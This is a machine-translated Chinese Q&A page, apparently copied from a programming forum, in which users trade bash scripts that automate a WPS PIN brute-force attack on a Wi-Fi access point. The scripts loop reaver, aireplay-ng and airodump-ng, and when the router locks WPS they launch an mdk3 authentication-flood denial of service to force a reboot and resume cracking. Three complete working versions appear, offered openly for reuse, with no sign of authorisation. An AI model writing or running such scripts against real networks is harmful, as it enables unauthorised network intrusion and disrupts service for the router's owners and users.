1. 首頁
  2. 問答
  3. bver script for reaver解鎖wps-locked狀態

bver script for reaver解鎖wps-locked狀態

2017-02-06 76 views
2

首先,對不起我可憐的英文不好。我正在嘗試編寫一個bash腳本,以便使用reaver執行AP WPS破解。問題是,在嘗試了一些WPS-PIN之後,AP鎖定了WPS,所以我的reaver不是有用的。bver script for reaver解鎖wps-locked狀態

爲了解決這個問題,我執行了一個mdk3攻擊,強制AP重啓並能夠再次攻擊它(重啓後,WPS重新處於解鎖狀態)。

這種方法的問題是:

  1. 我必須要在PC鎖定的前面,當AP被鎖定,
  2. 製造mdk3攻擊,阻止它當AP重新啓動並再次執行襲擊。對此的解決方案顯然是一個腳本。

我寫了下面幾行來解決這個問題。

我不得不說,我是bash腳本編寫的總noob,所以腳本不是「專業的」,它只是一個「workarround」來解決我的問題。

#!/bin/bash 

while true; do 
    # Switch to the correct channel and save it into $channel 
    echo Detecting AP channel 
    timeout 25 reaver -i wlan0mon -e AP_SSID -b AP_BSSID -q # Switch to the AP channel 
    rm ap_channel 2> /dev/null 
    touch ap_channel 
    timeout 5 aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon > ap_channel 
    channel="$(head -1 ap_channel | tail -c 2 | head -c 1)" 
    rm ap_channel 

    # Attacks the AP while it isn't wps-locked 
    rm ap_status 2> /dev/null 
    timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status 
    while [ -z "$(grep Locked ap_status)" ]; do 
     echo Performing reaver attack 
     aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon 
     timeout 30 reaver -i wlan0mon -e AP_SSID -b AP_BSSID --no-nacks -vv -s REAVER_PREV_SESSION.wpc -w -A -g 1 -C gnome-screenshot -f 
     rm ap_status 
     timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status 
    done 

    # The AP is now locked. Performs a mdk3 attack (in order to reboot the AP) while the AP wps-status is Locked 
    ((mdk3 wlan0mon a -a AP_BSSID -m) 2>&1) > /dev/null & 
    mdk3_pid=$! 
    rm ap_status 
    timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status 
    while [ -n "$(grep Locked ap_status)" ]; do 
     echo Trying to reboot the AP 
     rm ap_status 
     timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status 
    done 

    # The AP is now rebooted. Kill the mdk3 process and wait 2 mins to restart reaver attack 
    kill -9 $mdk3_pid 
    echo AP rebooted. Waiting 2 mins till AP init 
    sleep 120 
done

在這個腳本的問題是,我使用的airodump中輸出的標準輸出重定向,如果我直接在比如果我執行它在腳本中的命令行執行它運行不同的。

timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status

我需要一種方法來在腳本內執行上面的行,就像我直接在tty中執行它一樣。我不能使用exec來執行此操作,因爲我需要繼續執行腳本。

注:我不能使用airodump-ng的-w選項,因爲它不保存WPS狀態。

有人可以幫助我嗎?

來源

2017-02-06 user3368457

回答

0

我終於明白了。我找到了解決此問題的解決方法,將命令的標準輸出重定向到文件。我發佈腳本,也許有人可以使用它。

!/斌/慶典

while true; do 

rm attack 
rm ap_status 
rm ap_channel 

# Detects the AP channel 
echo Detecting AP channel 
timeout 45 reaver -i wlan0mon -e AP_SSID -b AP_BSSID -vv > ap_channel # Switch to the AP channel 
timeout 15 aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon > ap_channel 
channel="$(head -1 ap_channel | tail -c 3 | head -c 2)" 
rm ap_channel 
echo Detected AP channel $channel 

# Attacks the AP using reaver till the AP locks the WPS 
((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status & 
airodump_pid=$! 
sleep 10 
kill -9 $airodump_pid 

while [ -z "$(grep Locked ap_status)" ]; do 
    echo Performing reaver attack 
    aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon 
    timeout 30 reaver -i wlan0mon -e AP_SSID -b AP_BSSID --no-nacks -vv -s PREV_SESSION.wpc -w -A -g 1 -C gnome-screenshot -f 
    ((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status & 
    airodump_pid=$! 
    sleep 10 
    kill -9 $airodump_pid 
done 

# Force a reboot in the AP to unlock WPS 
((mdk3 wlan0mon a -a AP_BSSID -m) 2>&1) > attack & 
mdk3_pid=$! 

((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status & 
airodump_pid=$! 
sleep 10 
kill -9 $airodump_pid 

while [ -n "$(grep Locked ap_status -m 1)" ]; do 
    echo Trying to reboot the AP 
    ((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status & 
    airodump_pid=$! 
    sleep 10 
    kill -9 $airodump_pid 
done 

# The AP is now rebooted. Kill the mdk3 process and wait 2 mins to restart reaver attack 
kill -9 $mdk3_pid 
echo AP rebooted. Waiting 5 mins till AP init 
rm attack 
rm ap_status 
sleep 300 

done

的延遲設置爲多頭,但他們都OK。這取決於AP,你可以改變它們。

對於使用腳本,需要使用aircrack,reaver(最新版本,具有--wps選項的版本),timeout和mdk3軟件包。

如果知道bash腳本編寫的人想修改腳本並上傳更好的腳本,那將非常棒!

來源

2017-02-09 11:16:26 user3368457

0

我的變種。 固定延遲替換dynamic wait。 計數嘗試引腳和等待時間。

將「-C gnome-screenshot -f」替換爲你的截圖程序或刪除它。

!/bin/bash 

while true; do 

rm attack 2> null 
rm ap_status 2> null 
rm ap_channel 2> null 
rm assoc 2> null 

AP_SSID="TARGET_ESSID" 
AP_BSSID="TARGET_BSSID" 
MY_MAC="YOU_MAC" 
MON_INTERFACE=wlan0mon 
PREV_SESS_FILE="PREV_SESSION_FILE.wpc" 
countTryPin=0 
countFile=totalTryPinCount # count file to store total try pin 
waitTryReboot=0 # count wait time AP rebooting (DDOS MDK3) 
waitReboot=0 # count wait time AP recovery after rebooting 
touch $countFile 

echo -e -n "\n\nDetect channel" 

touch assoc 
((reaver -i $MON_INTERFACE -e $AP_SSID -b $AP_BSSID -A -s $PREV_SESS_FILE) 2>&1) > assoc & 
assoc_pid=$! 

while [ -z "$(grep Associated assoc)" ]; do 
    sleep 3 
    echo -n . 
done 

echo -e "\n\n" 
kill -9 $assoc_pid 
wait $assoc_pid 2> null 
rm assoc 

echo -n "Wait association" 
((aireplay-ng -1 0 -e $AP_SSID -a $AP_BSSID -h $MY_MAC $MON_INTERFACE) 2>&1) > ap_channel & 
    ap_channel_pid=$! 
while [ -z "$(grep successful ap_channel)" ]; do 
     sleep 1 
     echo -n "." 
done 

channel="$(head -1 ap_channel | tail -c 3 | head -c 2)" 
echo -e "\n\Channel set to $channel\n\n" 
rm ap_channel 

touch ap_status 
echo -n -e "\nCheck AP WPS lock" 
while [ -z "$(grep $AP_SSID ap_status)" ]; do 
    ((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status & 
    airodump_pid=$! 
    echo -n . 
    sleep 1 
    kill -9 $airodump_pid 
    wait $airodump_pid 2> null 
done 

echo -e "\n\n" 
((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status & 
    airodump_pid=$! 

while [ -z "$(grep $AP_SSID ap_status -m 1)" ]; do 
    sleep 2 
done 

kill -9 $airodump_pid 
wait $airodump_pid 2> null 

while [ -z "$(grep Locked ap_status -m 1)" ]; do 
    ((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status & 
    airodump_pid=$! 
    echo -e "\n\nBegig reaver attack\n\n" 
    echo -n "Wait association" 
     ((aireplay-ng -1 0 -e $AP_SSID -a $AP_BSSID -h $MY_MAC $MON_INTERFACE) 2>&1) > ap_channel & 
     ap_channel_pid=$! 
    while [ -z "$(grep successful ap_channel)" ]; do 
     sleep 1 
     echo -n "." 
    done 
    echo -e "\n\n" 
    timeout 10 reaver -i $MON_INTERFACE -e $AP_SSID -b $AP_BSSID --no-nacks -vv -s $PREV_SESS_FILE -w -A -g 1 -C gnome-screenshot -f # remove or replace "-C gnome-screenshot -f" to you screenshot programm 
    countTryPin=$[countTryPin + 1] 
    kill -9 $airodump_pid 
    wait $airodump_pid 2> null 
done 


# Force a reboot in the AP to unlock WPS 
((mdk3 $MON_INTERFACE a -a $AP_BSSID) 2>&1) > attack & 
mdk3_pid=$! 

echo -e "\n\n" 
while [ -n "$(grep Locked ap_status -m 1)" ] && [ -n "$(grep $AP_SSID ap_status -m 1)" ]; do 
    ((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status & 
    airodump_pid=$! 
    sleep 4 
    waitTryReboot=$[waitTryReboot + 4] 
    echo -e -n "\rTry calling reboot AP. Wait $waitTryReboot sec." 
    kill -9 $airodump_pid 
    wait $airodump_pid 2> null 
done 

# The AP is now rebooted. Kill the mdk3 process and wait 2 mins to restart reaver attack 
kill -9 $mdk3_pid 
wait $mdk3_pid 2> null 

totalTryPin=`cat $countFile` 
totalTryPin=$(($totalTryPin + $countTryPin)) 
echo $totalTryPin > $countFile 

echo -e "\n\n" 
while [ -z "$(grep $AP_SSID ap_status)" ]; do 
    # After reboot AP may be change channel. Run without channel 
    ((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID) 2>&1) > ap_status & 
    airodump_pid=$! 
    sleep 5 
    waitReboot=$[waitReboot + 5] 
    echo -e -n "\rAP rebooting. Wait $waitReboot sec." 
    kill -9 $airodump_pid 
    wait $airodump_pid 2> null 
done 

rm attack 
rm ap_status 
rm null 
execTime=$(($SECONDS+$waitTryReboot+$waitReboot)) 
echo -e "\n\nDone $countTryPin try pin.\ 
      \nCalling reboot AP wait time $waitTryReboot sec.\ 
      \nAP rebooting wait time $waitReboot sec.\ 
      \nTotal execute time $SECONDS sec.\ 
      \nTotal try pin $totalTryPin\n\n" 
sleep 3 
SECONDS=0 
done

來源

2017-08-27 10:08:05 user8523052

相關問題

 相關問題